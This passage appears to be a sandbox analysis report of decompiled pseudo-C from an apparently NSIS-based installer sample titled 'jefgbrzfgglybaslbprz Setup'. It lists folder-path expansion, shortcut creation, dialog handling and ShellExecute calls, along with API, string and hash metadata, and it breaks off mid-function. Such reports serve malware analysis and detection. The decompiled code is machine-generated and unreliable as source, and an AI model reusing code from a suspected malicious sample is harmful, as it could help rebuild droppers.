                      				CHAR* _t37;
                      				signed char _t39;
                      				signed int _t40;
                      				int _t41;
                      				char _t51;
                      				char _t52;
                      				char _t54;
                      				char _t56;
                      				void* _t64;
                      				signed int _t68;
                      				intOrPtr _t72;
                      				signed int _t73;
                      				signed char _t74;
                      				intOrPtr _t77;
                      				char _t81;
                      				void* _t83;
                      				CHAR* _t84;
                      				void* _t86;
                      				signed int _t93;
                      				signed int _t95;
                      				void* _t96;
                      
                      				_t86 = __esi;
                      				_t83 = __edi;
                      				_t64 = __ebx;
                      				_t36 = _a8;
                      				if(_t36 < 0) {
                      					_t77 =  *0x42367c; // 0x4e3b8b
                      					_t36 =  *(_t77 - 4 + _t36 * 4);
                      				}
                      				_t72 =  *0x423ed8; // 0x4e2694
                      				_t73 = _t72 + _t36;
                      				_t37 = 0x422e40;
                      				_push(_t64);
                      				_push(_t86);
                      				_push(_t83);
                      				_t84 = 0x422e40;
                      				if(_a4 - 0x422e40 < 0x800) {
                      					_t84 = _a4;
                      					_a4 = _a4 & 0x00000000;
                      				}
                      				while(1) {
                      					_t81 =  *_t73;
                      					if(_t81 == 0) {
                      						break;
                      					}
                      					__eflags = _t84 - _t37 - 0x400;
                      					if(_t84 - _t37 >= 0x400) {
                      						break;
                      					}
                      					_t73 = _t73 + 1;
                      					__eflags = _t81 - 0xfc;
                      					_a8 = _t73;
                      					if(__eflags <= 0) {
                      						if(__eflags != 0) {
                      							 *_t84 = _t81;
                      							_t84 =  &(_t84[1]);
                      							__eflags = _t84;
                      						} else {
                      							 *_t84 =  *_t73;
                      							_t84 =  &(_t84[1]);
                      							_t73 = _t73 + 1;
                      						}
                      						continue;
                      					}
                      					_t39 =  *(_t73 + 1);
                      					_t74 =  *_t73;
                      					_a8 = _a8 + 2;
                      					_v20 = _t39;
                      					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
                      					_t68 = _t74;
                      					_t40 = _t39 | 0x00000080;
                      					__eflags = _t81 - 0xfe;
                      					_v28 = _t68;
                      					_v24 = _t74 | 0x00000080;
                      					_v16 = _t40;
                      					if(_t81 != 0xfe) {
                      						__eflags = _t81 - 0xfd;
                      						if(_t81 != 0xfd) {
                      							__eflags = _t81 - 0xff;
                      							if(_t81 == 0xff) {
                      								__eflags = (_t40 | 0xffffffff) - _t93;
                      								E00405AA7(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
                      							}
                      							L41:
                      							_t41 = lstrlenA(_t84);
                      							_t73 = _a8;
                      							_t84 =  &(_t84[_t41]);
                      							_t37 = 0x422e40;
                      							continue;
                      						}
                      						__eflags = _t93 - 0x1d;
                      						if(_t93 != 0x1d) {
                      							__eflags = (_t93 << 0xa) + 0x424000;
                      							E00405A85(_t84, (_t93 << 0xa) + 0x424000);
                      						} else {
                      							E004059E3(_t84,  *0x423ea8);
                      						}
                      						__eflags = _t93 + 0xffffffeb - 7;
                      						if(_t93 + 0xffffffeb < 7) {
                      							L32:
                      							E00405CE3(_t84);
                      						}
                      						goto L41;
                      					}
                      					_t95 = 2;
                      					_t51 = GetVersion();
                      					__eflags = _t51;
                      					if(_t51 >= 0) {
                      						L12:
                      						_v8 = 1;
                      						L13:
                      						__eflags =  *0x423f24;
                      						if( *0x423f24 != 0) {
                      							_t95 = 4;
                      						}
                      						__eflags = _t68;
                      						if(_t68 >= 0) {
                      							__eflags = _t68 - 0x25;
                      							if(_t68 != 0x25) {
                      								__eflags = _t68 - 0x24;
                      								if(_t68 == 0x24) {
                      									GetWindowsDirectoryA(_t84, 0x400);
                      									_t95 = 0;
                      								}
                      								while(1) {
                      									__eflags = _t95;
                      									if(_t95 == 0) {
                      										goto L29;
                      									}
                      									_t52 =  *0x423ea4; // 0x73e81340
                      									_t95 = _t95 - 1;
                      									__eflags = _t52;
                      									if(_t52 == 0) {
                      										L25:
                      										_t54 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
                      										__eflags = _t54;
                      										if(_t54 != 0) {
                      											L27:
                      											 *_t84 =  *_t84 & 0x00000000;
                      											__eflags =  *_t84;
                      											continue;
                      										}
                      										__imp__SHGetPathFromIDListA(_v12, _t84);
                      										__imp__CoTaskMemFree(_v12);
                      										__eflags = _t54;
                      										if(_t54 != 0) {
                      											goto L29;
                      										}
                      										goto L27;
                      									}
                      									__eflags = _v8;
                      									if(_v8 == 0) {
                      										goto L25;
                      									}
                      									_t56 =  *_t52( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
                      									__eflags = _t56;
                      									if(_t56 == 0) {
                      										goto L29;
                      									}
                      									goto L25;
                      								}
                      								goto L29;
                      							}
                      							GetSystemDirectoryA(_t84, 0x400);
                      							goto L29;
                      						} else {
                      							_t71 = (_t68 & 0x0000003f) +  *0x423ed8;
                      							E0040596C(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x423ed8, _t84, _t68 & 0x00000040);
                      							__eflags =  *_t84;
                      							if( *_t84 != 0) {
                      								L30:
                      								__eflags = _v20 - 0x1a;
                      								if(_v20 == 0x1a) {
                      									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
                      								}
                      								goto L32;
                      							}
                      							E00405AA7(_t71, _t84, _t95, _t84, _v20);
                      							L29:
                      							__eflags =  *_t84;
                      							if( *_t84 == 0) {
                      								goto L32;
                      							}
                      							goto L30;
                      						}
                      					}
                      					__eflags = _t51 - 0x5a04;
                      					if(_t51 == 0x5a04) {
                      						goto L12;
                      					}
                      					__eflags = _v20 - 0x23;
                      					if(_v20 == 0x23) {
                      						goto L12;
                      					}
                      					__eflags = _v20 - 0x2e;
                      					if(_v20 == 0x2e) {
                      						goto L12;
                      					} else {
                      						_v8 = _v8 & 0x00000000;
                      						goto L13;
                      					}
                      				}
                      				 *_t84 =  *_t84 & 0x00000000;
                      				if(_a4 == 0) {
                      					return _t37;
                      				}
                      				return E00405A85(_a4, _t37);
                      			}

                      APIs
                      • GetVersion.KERNEL32(00000000,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405B4B
                      • GetSystemDirectoryA.KERNEL32 ref: 00405BC6
                      • GetWindowsDirectoryA.KERNEL32(bxrmcpz,00000400), ref: 00405BD9
                      • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405C15
                      • SHGetPathFromIDListA.SHELL32(00000000,bxrmcpz), ref: 00405C23
                      • CoTaskMemFree.OLE32(00000000), ref: 00405C2E
                      • lstrcatA.KERNEL32(bxrmcpz,\Microsoft\Internet Explorer\Quick Launch), ref: 00405C50
                      • lstrlenA.KERNEL32(bxrmcpz,00000000,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405CA2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                      • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$bxrmcpz
                      • API String ID: 900638850-1794800640
                      • Opcode ID: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
                      • Instruction ID: 02e69832ec688910c0edf1e4f77165a8fa6b6d990b95ba5e8d1c2d1c59892890
                      • Opcode Fuzzy Hash: 8c89faea656f75211a43bdfb02caabddeac7d8c4cf190b1a32756d1be722affe
                      • Instruction Fuzzy Hash: B251E371A08B19ABEB215B64CC84BBF3B74EB15714F14023BE911BA2D0D37C5982DE4E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 74%
                      			E00402012() {
                      				void* _t44;
                      				intOrPtr* _t48;
                      				intOrPtr* _t50;
                      				intOrPtr* _t52;
                      				intOrPtr* _t54;
                      				signed int _t58;
                      				intOrPtr* _t59;
                      				intOrPtr* _t62;
                      				intOrPtr* _t64;
                      				intOrPtr* _t66;
                      				intOrPtr* _t69;
                      				intOrPtr* _t71;
                      				int _t75;
                      				signed int _t81;
                      				intOrPtr* _t88;
                      				void* _t95;
                      				void* _t96;
                      				void* _t100;
                      
                      				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
                      				_t96 = E004029E8(0xffffffdf);
                      				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
                      				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
                      				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
                      				if(E004055E5(_t96) == 0) {
                      					E004029E8(0x21);
                      				}
                      				_t44 = _t100 + 8;
                      				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
                      				if(_t44 < _t75) {
                      					L13:
                      					 *((intOrPtr*)(_t100 - 4)) = 1;
                      					_push(0xfffffff0);
                      				} else {
                      					_t48 =  *((intOrPtr*)(_t100 + 8));
                      					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
                      					if(_t95 >= _t75) {
                      						_t52 =  *((intOrPtr*)(_t100 + 8));
                      						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                      						_t54 =  *((intOrPtr*)(_t100 + 8));
                      						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\hardz\\AppData\\Local\\Temp");
                      						_t81 =  *(_t100 - 0x14);
                      						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                      						if(_t58 != 0) {
                      							_t88 =  *((intOrPtr*)(_t100 + 8));
                      							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                      							_t81 =  *(_t100 - 0x14);
                      						}
                      						_t59 =  *((intOrPtr*)(_t100 + 8));
                      						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                      						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
                      							_t71 =  *((intOrPtr*)(_t100 + 8));
                      							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
                      						}
                      						_t62 =  *((intOrPtr*)(_t100 + 8));
                      						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
                      						_t64 =  *((intOrPtr*)(_t100 + 8));
                      						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
                      						if(_t95 >= _t75) {
                      							_t95 = 0x80004005;
                      							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409360, 0x400) != 0) {
                      								_t69 =  *((intOrPtr*)(_t100 - 0x34));
                      								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409360, 1);
                      							}
                      						}
                      						_t66 =  *((intOrPtr*)(_t100 - 0x34));
                      						 *((intOrPtr*)( *_t66 + 8))(_t66);
                      					}
                      					_t50 =  *((intOrPtr*)(_t100 + 8));
                      					 *((intOrPtr*)( *_t50 + 8))(_t50);
                      					if(_t95 >= _t75) {
                      						_push(0xfffffff4);
                      					} else {
                      						goto L13;
                      					}
                      				}
                      				E00401423();
                      				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
                      				return 0;
                      			}






















                      APIs
                      • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409360,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F
                      Strings
                      • C:\Users\user\AppData\Local\Temp, xrefs: 0040209D
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: ByteCharCreateInstanceMultiWide
                      • String ID: C:\Users\user\AppData\Local\Temp
                      • API String ID: 123533781-501415292
                      • Opcode ID: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
                      • Instruction ID: 9a85de16ea5d7a81ede148d9b78cdb1ba9a910f30d2aff7a9c0f788a9809de35
                      • Opcode Fuzzy Hash: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
                      • Instruction Fuzzy Hash: 0E414DB5A00104AFDB00DFA4CD89E9E7BBABF49314B20416AF905EB2D1DA79DD41CB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 39%
                      			E00402630(char __ebx, char* __edi, char* __esi) {
                      				void* _t19;
                      
                      				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
                      					E004059E3(__edi, _t6);
                      					_push(_t19 - 0x178);
                      					_push(__esi);
                      					E00405A85();
                      				} else {
                      					 *__edi = __ebx;
                      					 *__esi = __ebx;
                      					 *((intOrPtr*)(_t19 - 4)) = 1;
                      				}
                      				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
                      				return 0;
                      			}





                      APIs
                      • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: FileFindFirst
                      • String ID:
                      • API String ID: 1974802433-0
                      • Opcode ID: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
                      • Instruction ID: 76eef0906e3fa6c86cf2ebea0eb1ad5f879b60bc34498b8afccad509cb3c3919
                      • Opcode Fuzzy Hash: e252be4d8dac41554fd361ab132364df58656f291f34e3e62bfafec942fe1f51
                      • Instruction Fuzzy Hash: 67F0A772A04100EED700EBB59D49EFE7778DF11324F6005BBE111B20C1C7B889419A2A
                      Uniqueness

                      Uniqueness Score: -1.00%


                      C-Code - Quality: 84%
                      			E00403964(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                      				struct HWND__* _v32;
                      				void* _v84;
                      				void* _v88;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t35;
                      				signed int _t37;
                      				signed int _t39;
                      				intOrPtr _t44;
                      				struct HWND__* _t49;
                      				signed int _t67;
                      				struct HWND__* _t73;
                      				signed int _t86;
                      				struct HWND__* _t91;
                      				signed int _t99;
                      				int _t103;
                      				signed int _t115;
                      				signed int _t116;
                      				int _t117;
                      				signed int _t122;
                      				struct HWND__* _t125;
                      				struct HWND__* _t126;
                      				int _t127;
                      				long _t130;
                      				int _t132;
                      				int _t133;
                      				void* _t134;
                      				void* _t142;
                      
                      				_t115 = _a8;
                      				if(_t115 == 0x110 || _t115 == 0x408) {
                      					_t35 = _a12;
                      					_t125 = _a4;
                      					__eflags = _t115 - 0x110;
                      					 *0x42047c = _t35;
                      					if(_t115 == 0x110) {
                      						 *0x423ea8 = _t125;
                      						 *0x420490 = GetDlgItem(_t125, 1);
                      						_t91 = GetDlgItem(_t125, 2);
                      						_push(0xffffffff);
                      						_push(0x1c);
                      						 *0x41f458 = _t91;
                      						E00403E37(_t125);
                      						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
                      						 *0x42366c = E0040140B(4);
                      						_t35 = 1;
                      						__eflags = 1;
                      						 *0x42047c = 1;
                      					}
                      					_t122 =  *0x4091bc; // 0xffffffff
                      					_t133 = 0;
                      					_t130 = (_t122 << 6) +  *0x423ec0;
                      					__eflags = _t122;
                      					if(_t122 < 0) {
                      						L34:
                      						E00403E83(0x40b);
                      						while(1) {
                      							_t37 =  *0x42047c;
                      							 *0x4091bc =  *0x4091bc + _t37;
                      							_t130 = _t130 + (_t37 << 6);
                      							_t39 =  *0x4091bc; // 0xffffffff
                      							__eflags = _t39 -  *0x423ec4; // 0x2
                      							if(__eflags == 0) {
                      								E0040140B(1);
                      							}
                      							__eflags =  *0x42366c - _t133; // 0x0
                      							if(__eflags != 0) {
                      								break;
                      							}
                      							_t44 =  *0x423ec4; // 0x2
                      							__eflags =  *0x4091bc - _t44; // 0xffffffff
                      							if(__eflags >= 0) {
                      								break;
                      							}
                      							_t116 =  *(_t130 + 0x14);
                      							E00405AA7(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
                      							_push( *((intOrPtr*)(_t130 + 0x20)));
                      							_push(0xfffffc19);
                      							E00403E37(_t125);
                      							_push( *((intOrPtr*)(_t130 + 0x1c)));
                      							_push(0xfffffc1b);
                      							E00403E37(_t125);
                      							_push( *((intOrPtr*)(_t130 + 0x28)));
                      							_push(0xfffffc1a);
                      							E00403E37(_t125);
                      							_t49 = GetDlgItem(_t125, 3);
                      							__eflags =  *0x423f2c - _t133; // 0x0
                      							_v32 = _t49;
                      							if(__eflags != 0) {
                      								_t116 = _t116 & 0x0000fefd | 0x00000004;
                      								__eflags = _t116;
                      							}
                      							ShowWindow(_t49, _t116 & 0x00000008);
                      							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
                      							E00403E59(_t116 & 0x00000002);
                      							_t117 = _t116 & 0x00000004;
                      							EnableWindow( *0x41f458, _t117);
                      							__eflags = _t117 - _t133;
                      							if(_t117 == _t133) {
                      								_push(1);
                      							} else {
                      								_push(_t133);
                      							}
                      							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
                      							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
                      							__eflags =  *0x423f2c - _t133; // 0x0
                      							if(__eflags == 0) {
                      								_push( *0x420490);
                      							} else {
                      								SendMessageA(_t125, 0x401, 2, _t133);
                      								_push( *0x41f458);
                      							}
                      							E00403E6C();
                      							E00405A85(0x420498, "jefgbrzfgglybaslbprz Setup");
                      							E00405AA7(0x420498, _t125, _t130,  &(0x420498[lstrlenA(0x420498)]),  *((intOrPtr*)(_t130 + 0x18)));
                      							SetWindowTextA(_t125, 0x420498);
                      							_push(_t133);
                      							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
                      							__eflags = _t67;
                      							if(_t67 != 0) {
                      								continue;
                      							} else {
                      								__eflags =  *_t130 - _t133;
                      								if( *_t130 == _t133) {
                      									continue;
                      								}
                      								__eflags =  *(_t130 + 4) - 5;
                      								if( *(_t130 + 4) != 5) {
                      									DestroyWindow( *0x423678);
                      									 *0x41fc68 = _t130;
                      									__eflags =  *_t130 - _t133;
                      									if( *_t130 <= _t133) {
                      										goto L58;
                      									}
                      									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c0 +  *(_t130 + 4) * 4), _t130);
                      									__eflags = _t73 - _t133;
                      									 *0x423678 = _t73;
                      									if(_t73 == _t133) {
                      										goto L58;
                      									}
                      									_push( *((intOrPtr*)(_t130 + 0x2c)));
                      									_push(6);
                      									E00403E37(_t73);
                      									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                      									ScreenToClient(_t125, _t134 + 0x10);
                      									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
                      									_push(_t133);
                      									E00401389( *((intOrPtr*)(_t130 + 0xc)));
                      									__eflags =  *0x42366c - _t133; // 0x0
                      									if(__eflags != 0) {
                      										goto L61;
                      									}
                      									ShowWindow( *0x423678, 8);
                      									E00403E83(0x405);
                      									goto L58;
                      								}
                      								__eflags =  *0x423f2c - _t133; // 0x0
                      								if(__eflags != 0) {
                      									goto L61;
                      								}
                      								__eflags =  *0x423f20 - _t133; // 0x0
                      								if(__eflags != 0) {
                      									continue;
                      								}
                      								goto L61;
                      							}
                      						}
                      						DestroyWindow( *0x423678);
                      						 *0x423ea8 = _t133;
                      						EndDialog(_t125,  *0x41f860);
                      						goto L58;
                      					} else {
                      						__eflags = _t35 - 1;
                      						if(_t35 != 1) {
                      							L33:
                      							__eflags =  *_t130 - _t133;
                      							if( *_t130 == _t133) {
                      								goto L61;
                      							}
                      							goto L34;
                      						}
                      						_push(0);
                      						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
                      						__eflags = _t86;
                      						if(_t86 == 0) {
                      							goto L33;
                      						}
                      						SendMessageA( *0x423678, 0x40f, 0, 1);
                      						__eflags =  *0x42366c - _t133; // 0x0
                      						return 0 | __eflags == 0x00000000;
                      					}
                      				} else {
                      					_t125 = _a4;
                      					_t133 = 0;
                      					if(_t115 == 0x47) {
                      						SetWindowPos( *0x420470, _t125, 0, 0, 0, 0, 0x13);
                      					}
                      					if(_t115 == 5) {
                      						asm("sbb eax, eax");
                      						ShowWindow( *0x420470,  ~(_a12 - 1) & _t115);
                      					}
                      					if(_t115 != 0x40d) {
                      						__eflags = _t115 - 0x11;
                      						if(_t115 != 0x11) {
                      							__eflags = _t115 - 0x111;
                      							if(_t115 != 0x111) {
                      								L26:
                      								return E00403E9E(_t115, _a12, _a16);
                      							}
                      							_t132 = _a12 & 0x0000ffff;
                      							_t126 = GetDlgItem(_t125, _t132);
                      							__eflags = _t126 - _t133;
                      							if(_t126 == _t133) {
                      								L13:
                      								__eflags = _t132 - 1;
                      								if(_t132 != 1) {
                      									__eflags = _t132 - 3;
                      									if(_t132 != 3) {
                      										_t127 = 2;
                      										__eflags = _t132 - _t127;
                      										if(_t132 != _t127) {
                      											L25:
                      											SendMessageA( *0x423678, 0x111, _a12, _a16);
                      											goto L26;
                      										}
                      										__eflags =  *0x423f2c - _t133; // 0x0
                      										if(__eflags == 0) {
                      											_t99 = E0040140B(3);
                      											__eflags = _t99;
                      											if(_t99 != 0) {
                      												goto L26;
                      											}
                      											 *0x41f860 = 1;
                      											L21:
                      											_push(0x78);
                      											L22:
                      											E00403E10();
                      											goto L26;
                      										}
                      										E0040140B(_t127);
                      										 *0x41f860 = _t127;
                      										goto L21;
                      									}
                      									__eflags =  *0x4091bc - _t133; // 0xffffffff
                      									if(__eflags <= 0) {
                      										goto L25;
                      									}
                      									_push(0xffffffff);
                      									goto L22;
                      								}
                      								_push(_t132);
                      								goto L22;
                      							}
                      							SendMessageA(_t126, 0xf3, _t133, _t133);
                      							_t103 = IsWindowEnabled(_t126);
                      							__eflags = _t103;
                      							if(_t103 == 0) {
                      								goto L61;
                      							}
                      							goto L13;
                      						}
                      						SetWindowLongA(_t125, _t133, _t133);
                      						return 1;
                      					} else {
                      						DestroyWindow( *0x423678);
                      						 *0x423678 = _a12;
                      						L58:
                      						if( *0x421498 == _t133) {
                      							_t142 =  *0x423678 - _t133; // 0x0
                      							if(_t142 != 0) {
                      								ShowWindow(_t125, 0xa);
                      								 *0x421498 = 1;
                      							}
                      						}
                      						L61:
                      						return 0;
                      					}
                      				}
                      			}
































                      0x00403a3c
                      0x00000000
                      0x00403a3c
                      0x00403a22
                      0x00403a29
                      0x00403a2f
                      0x00403a31
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403a31
                      0x004039ed
                      0x00000000
                      0x004039cb
                      0x004039d1
                      0x004039db
                      0x00403de1
                      0x00403de7
                      0x00403de9
                      0x00403def
                      0x00403df4
                      0x00403dfa
                      0x00403dfa
                      0x00403def
                      0x00403e04
                      0x00000000
                      0x00403e04
                      0x004039c9

                      APIs
                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039A0
                      • ShowWindow.USER32(?), ref: 004039BD
                      • DestroyWindow.USER32 ref: 004039D1
                      • SetWindowLongA.USER32(?,00000000,00000000), ref: 004039ED
                      • GetDlgItem.USER32 ref: 00403A0E
                      • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A22
                      • IsWindowEnabled.USER32(00000000), ref: 00403A29
                      • GetDlgItem.USER32 ref: 00403AD7
                      • GetDlgItem.USER32 ref: 00403AE1
                      • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403AFB
                      • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B4C
                      • GetDlgItem.USER32 ref: 00403BF2
                      • ShowWindow.USER32(00000000,?), ref: 00403C13
                      • EnableWindow.USER32(?,?), ref: 00403C25
                      • EnableWindow.USER32(?,?), ref: 00403C40
                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C56
                      • EnableMenuItem.USER32 ref: 00403C5D
                      • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403C75
                      • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403C88
                      • lstrlenA.KERNEL32(00420498,?,00420498,jefgbrzfgglybaslbprz Setup), ref: 00403CB1
                      • SetWindowTextA.USER32(?,00420498), ref: 00403CC0
                      • ShowWindow.USER32(?,0000000A), ref: 00403DF4
                      Strings
                      • jefgbrzfgglybaslbprz Setup, xrefs: 00403CA2
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                      • String ID: jefgbrzfgglybaslbprz Setup
                      • API String ID: 184305955-2357613177
                      • Opcode ID: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
                      • Instruction ID: caafd2a66b76c4ae3962cc82e2ded254e31ce9ec1c8840106f3b43a2641cb278
                      • Opcode Fuzzy Hash: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
                      • Instruction Fuzzy Hash: 95C1AF71A04204BBDB206F21ED85E2B7E7CEB05706F40453EF641B12E1C779AA429F6E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 93%
                      			E00403F7F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                      				char _v8;
                      				signed int _v12;
                      				void* _v16;
                      				struct HWND__* _t52;
                      				intOrPtr _t71;
                      				intOrPtr _t85;
                      				long _t86;
                      				int _t98;
                      				struct HWND__* _t99;
                      				signed int _t100;
                      				intOrPtr _t103;
                      				intOrPtr _t107;
                      				intOrPtr _t109;
                      				int _t110;
                      				signed int* _t112;
                      				signed int _t113;
                      				char* _t114;
                      				CHAR* _t115;
                      
                      				if(_a8 != 0x110) {
                      					if(_a8 != 0x111) {
                      						L11:
                      						if(_a8 != 0x4e) {
                      							if(_a8 == 0x40b) {
                      								 *0x420478 =  *0x420478 + 1;
                      							}
                      							L25:
                      							_t110 = _a16;
                      							L26:
                      							return E00403E9E(_a8, _a12, _t110);
                      						}
                      						_t52 = GetDlgItem(_a4, 0x3e8);
                      						_t110 = _a16;
                      						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                      							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                      							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                      							_v12 = _t100;
                      							_v16 = _t109;
                      							_v8 = 0x422e40;
                      							if(_t100 - _t109 < 0x800) {
                      								SendMessageA(_t52, 0x44b, 0,  &_v16);
                      								SetCursor(LoadCursorA(0, 0x7f02));
                      								_t40 =  &_v8; // 0x422e40
                      								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
                      								SetCursor(LoadCursorA(0, 0x7f00));
                      								_t110 = _a16;
                      							}
                      						}
                      						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
